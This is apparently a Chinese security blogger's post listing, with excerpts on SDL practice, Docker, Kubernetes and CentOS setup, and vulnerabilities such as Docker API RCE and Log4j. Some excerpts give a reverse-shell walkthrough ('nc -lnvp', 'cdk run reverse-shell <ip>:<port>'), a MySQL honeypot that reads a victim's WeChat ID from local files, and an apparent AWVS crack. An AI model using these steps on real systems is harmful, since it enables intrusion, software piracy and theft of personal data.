- 博客(2492)
- 资源 (91)
- 收藏
- 关注
RSS订阅原创 【SDL实践指南】SDL安全设计概述
安全设计的目的是在程序研发之初就通过威胁建模等方式发现潜在的安全问题并引入安全功能从而规避安全风险并为安全提供有力保障,由此可见安全设计是随着产品业务的变动而变动的(例如:产品线变化、新增功能等)而并非一成不变,上面美的的安全设计CheckList很好的提炼了一些通用的安全设计很是值得借鉴
2023-03-27 09:47:47
1278
原创 【SDL实践指南】安全风险处理实施
信息安全风险管理是信息安全保障工作中的一项重要基础性工作,其核心思想是对管理对象面临的信息安全风险进行管控。信息安全风险管理工作贯穿于信息系统生命周期(规划、设计、实施、运行维护和废弃)的全过程,主要工作过程包括风险评估和风险处理两个基本步骤,风险评估是对风险管理对象所面临的风险进行识别、分析和评价的过程,风险处理是依据风险评估的结果,选择和实施安全措施的过程。
2023-03-27 09:43:30
422
原创 【SDL实践指南】安全风险评估规范
信息安全风险管理是信息安全保障工作中的一项重要基础性工作,其核心思想是对管理对象面临的信息安全风险进行管控。信息安全风险管理工作贯穿于信息系统生命周期(规划、设计、实施、运行维护和废弃)的全过程主要工作过程包括风险评估和风险处理两个基本步骤。风险评估是对风险管理对象所面临的风险进行识别、分析和评价的过程,风险处理是依据风险评估的结果,选择和实施安全措施的过程
2023-03-27 09:39:56
985
原创 【SDL实践指南】安全需求概述
安全需求作为SDL的第二个环节实施时需要特别注意安全评估流程制度的贯宣和安全评审阶段对安全质量的要求声明,如果前期不重视安全后期安全评审时要么就是因为种种原因导致产品无法上线,要么就是走绿色通道使得产品"带病"上线,增加安全风险
2023-03-27 09:38:03
529
原创 【SDL实践指南】SDL基本介绍
SDL(Security Development Lifecycle,安全开发生命周期)是由微软提出的一种从安全角度指导软件开发的管理模式,它主要通过在传统的软件开发生命周期的各个阶段穿插一系列的安全活动来保障和提升产品自身的安全能力
2023-03-27 09:34:37
886
原创 【SDL实践指南】安全培训介绍
安全并不仅仅是安全团队的本职工作,也是企业的每个研发人员、产品经理、项目经理、企业高管额外的工作,每个企业员工都应该要了解安全基础知识并知道如何在软件和服务中构建安全以使产品更加安全,并在满足业务需求的同时并提供安全价值。在企业SDL安全建设的第一步就是安全培训,这为企业构建安全体系制定了一个很好的基调,企业可以结合自身特点来制定安全培训计划和安全培训方式,就目前而言很多大公司的安全培训内容都要求必须要贯穿整个SDL流程,但安全培训的目的并非是要确保每个人都成为安全专家,也不是力求要成为熟练的渗透测试人员
2023-03-27 09:34:30
410
原创 Docker Daemon API未授权
Docker Remote API是一个取代远程命令行界面(RCLI)的REST API,当该接口直接暴漏在外网环境中且未作权限检查时,攻击者可以通过恶意调用相关的API实现远程命令执行。Step 5:进入容器并通过nc进行反弹shell。Step 4:查看运行的容器信息获取对应的容器ID。Step 6:在攻击主机中成功接收到shell。Step 1:在VPS上监听9999端口。Step 2:查看目标系统上存在的镜像。Step 3:之后创建一个轻量级镜像。Step 7:退出并删除容器。
2022-10-24 09:45:28
588
原创 思维导图绘制推荐
文章前言自从笔者自己开始画思维导图后,深感思维导图的好处,有时候我们将大量的文本内容存储到本地文件夹目录下或者使用本地云笔记,例如:为知笔记(笔者一直在用),但是后期会发现随着时间的推移,自己的存储越来越多,而知识体系的梳理却并未开展,整个体系还是一团混乱,所以这也是我最初为什么画思维导图的原因思维导图这里推荐一个在线的思维导图绘制地址(当然也带着一些想要扩容的想法,希望读者多多帮助):https://www.processon.com/i/5dd49da1e4b0dd608828e123
2022-05-12 17:29:10
933
原创 CVE-2022-1388:F5 BIG-IP iControl REST RCE
影响产品F5 BIG-IP 11.6.1 - 11.6.5 F5 BIG-IP 12.1.0 - 12.1.6 F5 BIG-IP 13.1.0 - 13.1.4 F5 BIG-IP 14.1.0 - 14.1.4 F5 BIG-IP 15.1.0 - 15.1.5 F5 BIG-IP 16.1.0 - 16.1.2漏洞影响此漏洞可能允许未经身份验证的攻击者通过管理端口和/或自身IP地址对BIG-IP系统进行网络访问,以执行任意系统命令、创建或删除文件或禁用服务漏洞检测检测脚本:
2022-05-12 12:32:25
795
翻译 Pwning a Server using Markdown
背景介绍Hashnode是一个面向开发人员的博客平台,您可以在其中使用自定义域免费托管您的博客,这包含许多功能,其中一项功能是"Bulk Markdown Importer"当我将我的博客从Jekyll迁移到Hashnode时,我正在寻找一个导入功能,幸运的是Hashnode有一个markdown导入器,允许批量导入markdown帖子,但需要采用某种特定格式,出于某种原因,我在导入帖子时不断出错,我无法弄清楚,因为UI上没有描述性错误,然后我查看了我的Burp中的响应,就在那时我注意到了导致我
2022-05-08 10:48:25
466
翻译 使用krbrelayx和mitm6通过DNS中继Kerbeos
文章前言我喜欢的一件事是当我认为我很好地理解了一个话题,然后有人证明我完全错了。当James Forshaw发表一篇关于Kerberos中继的博客时,或多或少发生了这种情况,这反驳了我几年前不能中继Kerberos的结论. James表明有一些技巧可以使Windows对不同的服务主体名称(SPN)进行身份验证,而不是通常从客户端连接到的主机名派生的名称,这意味着Kerberos并不像我假设的那样完全防中继。这促使我研究了一些替代的滥用路径,包括我几年前研究过但永远无法工作的东西:中继DNS身份验证。当您
2022-05-07 20:50:50
873
原创 CentOS安装NPM
安装步骤Step 1:创建目录mkdir /usr/local/node/cd /usr/local/node/Step 2:下载安装包wget https://npm.taobao.org/mirrors/node/v14.17.6/node-v14.17.6-linux-x64.tar.gzStep 3:解压安装包tar -zxvf node-v14.17.6-linux-x64.tar.gzStep 4:移除安装包并建立软连接rm -rf n
2022-05-04 17:57:27
6537
3
原创 Mysql蜜罐使用
文章前言本篇文章我们主要介绍如何通过搭建一个Fake Mysql来伪装Mysql服务器并诱导攻击者来连接,之后利用漏洞来读取攻击者电脑的文件以进行对攻击者进行刻画肖像获取思路下面我们介绍一下读取手机号和微信ID的正常方法,分为以下三个步骤:通过C:/Windows/PFRO.log获取windows用户名 通过C:/Users/用户名/Documents/WeChat Files/All Users/config/config.data获取wxid 通过C:/Users/用户名/Do..
2022-05-04 16:42:38
2172
1
原创 Mysql-ReadFile利用思路
文章前言本篇文章我们主要介绍如何通过搭建一个Fake Mysql来伪装Mysql服务器并通过主动连接的方式来获取连接端的敏感文件的,也许会有人说自己连自己那还有啥意思呢?在某些情况下我们可以通过漏洞利用获取到Web后台的地址之后可以操控数据库连接配置时就会显得非常有用了项目地址https://github.com/Al1ex/Mysql-Readfile项目使用Step 1:启动服务Step 2:操控连接配置连接恶意客户端获取客户端文件PS:这里要获取的文件可以在
2022-05-04 16:35:23
1402
原创 Spring Boot框架基础概览
基本概述Spring Boot是所有基于Spring开发的项目的起点,Spring Boot的设计是为了让你尽可能快的跑起来Spring应用程序并且尽可能减少你的配置文件,它采用了"习惯优于配置"的理念,就像Maven整合了所有的JAR包一样,Spring boot整合了所有框架框架特色Spring Boot开发项目只需要非常少的几个配置就可以搭建起来一个Web项目,并且利用IDEA可以自动生成,它主要有以下特点:简单、快速、方便地搭建项目 对主流开发框架的无配置集成 极大提高了开发、部
2022-04-21 10:11:07
1676
3
原创 好用的Maven仓库推荐
文章前言使用Mavne进行项目构建是目前比较流行也是一种较为简洁的方式,但是当我们在pom中添加相关的依赖时,Maven依赖检索仓库就显得尤为重要,之前使用过阿里的仓库检索,但是不是那么好,故而有了这篇文章仓库推荐https://mvnrepository.com/可以看到这里还会标注出那些依赖有安全风险,这对开发人员来说又是一个极大的福利pom添加文本:...
2022-04-18 10:11:11
1322
原创 Spring Boot项目热部署实现
文章前言Spring Boot提供了热部署功能,所谓热部署就是当你修改了代码后不用重新启动服务器只要重新编译一下当前项目就可以实现对项目的重新部署,这极大的节省了部署应用时间,对于开发体验还是有很大提升的,因为我们不用一修改了代码就部署应用,因为部署应用也是会花费很长时间的具体实现Spring Boot目前支持两种热部署方案,一种是利用SpringLoader插件,另一种是使用DevTools工具SpringLoader在pom.xml文件中添加如下依赖 <!-
2022-04-18 10:03:31
675
原创 springboot项目报错Request header is too large之解决方案
所遇问题IDEA中启动Spring项目在做测试时发现请求头数据构造的过大导致无法处理亲求解决方法由于Spring Boot是内置Tomcat的所以不能修改Tomcat的文件内容,在这里我们可以在D:\Environment\JAVA\Project\Projectxxx\target\classes\application.properties中加入一下配置项server.max-http-header-size=4048576...
2022-04-07 15:56:17
2320
原创 Back-off restarting failed container
所遇问题Back-off restarting failed container基本原理Back-off restarting failed container的Warning事件,一般是由于通过指定的镜像启动容器后,容器内部没有常驻进程,导致容器启动成功后即退出,从而进行了持续的重启解决方法找到对应的deployment添加以下信息command: ["/bin/bash", "-ce", "tail -f /dev/null"]...
2022-02-08 14:39:59
3861
原创 Error response from daemon: unable to find user ubuntu: no matching entries in passwd file
所遇问题使用特定的用户启动docker时发现报错:"Error response from daemon: unable to find user ubuntu: no matching entries in passwd file"解决方法Step 1:查看/etc/passwd获取idStep 2:以id替换username启动
2022-01-27 11:50:34
10743
1
原创 CVE-2021-4034:pkexec本地提权
影响范围Polkit Pkexec漏洞类型本地权限提升利用条件影响范围应用漏洞概述Polkit是一个应用程序级别的工具集,通过定义和审核权限规则,实现不同优先级进程间的通讯,控制决策集中在统一的框架之中,决定低优先级进程是否有权访问高优先级进程Polkit在系统层级进行权限控制,提供了一个低优先级进程和高优先级进程进行通讯的系统,它和sudo等程序不同,Polkit并没有赋予进程完全的root权限,而是通过一个集中的策略系统进行更精细的授权,这个漏洞是本地触发,只有在获得有限
2022-01-27 10:33:34
3322
原创 K8s强制删除Pod
文章前言很多情况下当我们使用"kubectl delete pod <podname> -n <namespace>"指令来删除Pod时会发现删除的Pod会再一段时间后自动重启,这是由于该命令和k8s的容灾机制冲突了, 也就是说,k8s会误认为这个pod异常挂掉了, 然后立即启动个新的pod, 从而导致了春风吹又生的情况,所以要想删除该Pod我们需得先撤销掉该pod的容灾机制, 比如删除他的deployment机制,之后再删除该Pod本篇文章主要介绍如何彻底删除Pod解决方法
2022-01-24 09:33:29
9195
1
原创 CVE-2019-16884:Apparmor Restriction Bypass
影响范围runc 1.0.0-rc8漏洞类型容器逃逸漏洞利用条件影响范围应用漏洞概述在Docker 19.03. 2-ce和其他产品中使用的runc 1.0.0-rc8允许绕过AppArmor限制,因为libcontainer/rootfs_linux.go错误地检查装载目标,攻击者可以在容器镜像中可以声明一个VOLUME并挂载至/proc,之后欺骗runc使其认为AppArmor已经成功应用从而绕过AppArmor策略,该漏洞由Adam Iwaniuk发现并在DragonSec
2022-01-13 14:16:02
3501
原创 AWVS13安装教程
工具简介AWVS是一款自动化应用程序安全测试工具,支持windows平台,主要用于扫描web应用程序上的安全问题,如SQL注入,XSS,目录遍历,命令注入等工具下载链接: https://pan.baidu.com/s/1lJR5gmPc-yNDtgYmmIAGSg?pwd=qfdh提取码: qfdh工具安装Step 1:运行安装程序进行安装Step 2:将wvsc.exe覆盖到"C:\Program Files (x86)\Acu...
2022-01-05 10:07:15
3306
原创 flannel安装报错
所遇问题The connection to the server localhost:8080 was refused - did you specify the right host or port?解决方法具体原因:kubenetes master没有与本机绑定,集群初始化的时候没有设置解决方法:Step 1:编辑文件/etc/profile并在底部增加新的环境变量export KUBECONFIG=/etc/kubernetes/admin.confSte.
2021-12-31 17:58:22
1591
1
原创 CentOS安装Docker
Step 1:卸载旧版本(如果安装过旧版本的话)sudo yum remove docker docker-common docker-selinux docker-engineStep 2:安装需要的软件包sudo yum install -y yum-utils device-mapper-persistent-data lvm2Step 3:设置yum源Step 4:查看所有仓库中所有docker版本yum list docker-ce --show.
2021-12-31 12:17:53
924
原创 CentOS 7静态IP在主机重启后失效解决
问题描述今天搭建了CentOS的环境,当时因为太迟了,下班比较急,所以直接强行关闭了虚拟机,解决在重启物理机后重启虚拟机进入CentOS主机时发现IP配置没了,而且无法上网,所以就有了这篇文章解决方法Step 1:执行以下命令systemctl stop NetworkManagersystemctl disable NetworkManagerStep 2:重启网卡sudo systemctl start network.service...
2021-12-30 22:51:55
4096
原创 CentOS配置静态IP地址
文章前言使用虚拟机搭建CentOS之后你会发现每次虚拟机重启之后都会重新获取一次新的IP地址,这有时候时我们不想的,本篇文章将介绍如何配置静态IP地址配置方法Step 1:查看网卡完整名称ls /etc/sysconfig/network-scripts/Step 2:修改网卡配置vi /etc/sysconfig/network-scripts/ifcfg-ens33相关参数:BOOTPROTO="static" # 使用静...
2021-12-30 17:41:29
8900
1
原创 CentOS 7安装过程
安装流程Step 1:在虚拟机中安装CentOS,进入如下界面中进行安装配置,如下图所示:注意:"软件选择"建议选择最后一个"开发及生产工作站","安装位置"选择默认"自动分区",禁用Kdump,打开网络,让你的虚拟机可以连接到互联网Step 2:设置Root密码,进行安装CentOS 7系统Step 3:进行语言环境的配置...
2021-12-29 23:24:55
1229
1
原创 Docker反弹shell
文章前言本篇文章我们主要介绍一些在Docker中反弹shell到远程服务器的方法常见方法Step 1:在远程服务器端监听端口nc -lnvp 9999Step 2:通过CDK反弹shell#命令格式cdk run reverse-shell <ip>:<port>#使用实例cdk run reverse-shell 192.168.17.143:9999Step 3:成功获取到shell其他技巧我们还可以使用反引号...
2021-12-27 16:04:14
2524
原创 Docker环境中文件复制
文章前言本篇文章我们主要介绍Docker下的文件复制操作,从物理主机到Docker容器,再从Docker容器到物理主机复制操作A、物理主机到Docker容器Step 1:查看所有Docker容器,获取容器IDsudo docker ps -aStep 2:文件复制操作#基本格式docker cp 本地路径 容器ID:容器路径#使用实例docker cp /home/ubuntu/cdk 32c9313eb98f:/tmp/cdkB、Docker容...
2021-12-27 11:13:38
4198
原创 Docker环境检测方式
检测方法首先我们需要先判断是否在docker环境里,常用的两个检测方式方式一:检查/.dockerenv文件是否存在ls -al /方式二:检查/proc/1/cgroup内是否包含"docker"等字符串ls -al /proc/1/cgroup...
2021-12-27 10:09:18
1717
原创 Kali Linux离线安装Docker
安装步骤Step 1:下载docker离线安装包Index of linux/static/stable/x86_64/Step 2:解压缩操作tar -zxfdocker-20.10.9.tgzStep 3:复制文件到/usr/bincp docker/* /usr/bin/Step 4:新建文件/etc/systemd/system/docker.service并输入以下内容[Unit]Description=Docker Applicat...
2021-12-24 23:47:28
995
原创 N: 无法安全地用该源进行更新,所以默认禁用该源
所遇问题在Kali Linux中执行apt-get update进行更新操作时发现报错:N: 无法安全地用该源进行更新,所以默认禁用该源解决方法sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys ED444FF07D8D0BF6备注说明:ED444FF07D8D0BF6源自你自己报错的信息再次执行更新操作:apt-get update...
2021-12-24 22:16:49
8594
3
原创 从Docker Daemon API未授权访问到RCE
影响范围Docker ALL漏洞类型未授权访问类利用条件REST API外置漏洞概述Docker Remote API是一个取代远程命令行界面(RCLI)的REST API,当该接口直接暴漏在外网环境中且未作权限检查时,攻击者可以通过恶意调用相关的API实现远程命令执行漏洞复现环境搭建下载环境mkdir dockercd dockerwget https://raw.githubusercontent.com/vulhub/vulhub/master/d..
2021-12-24 11:00:57
3354
原创 CVE-2021-44228:Apache Log4j RCE
文章前言本篇文章我们主要介绍关于CVE-2021-44228:Apache Log4j RCE漏洞的自检与修复,帮助甲方人员尽快修复项目中存在的不安全依赖漏洞概述Apache Log4j2是⼀个基于Java的⽇志记录⼯具,该⼯具重写了Log4j框架,并且引⼊了⼤量丰富的特性,该⽇志框架被⼤量⽤于业务系统开发,⽤来记录⽇志信息,⼤多数情况下,开发者可能会将⽤户输⼊导致的错误信息写⼊⽇志中,由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执⾏漏洞。该漏洞
2021-12-18 13:26:48
1682
MobaXterm终端工具
2019-02-15
Foritify 19.txt
2020-05-14
EW和SocksCap64.rar
2020-09-08
Fast Email Verifier.rar
2021-09-01
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人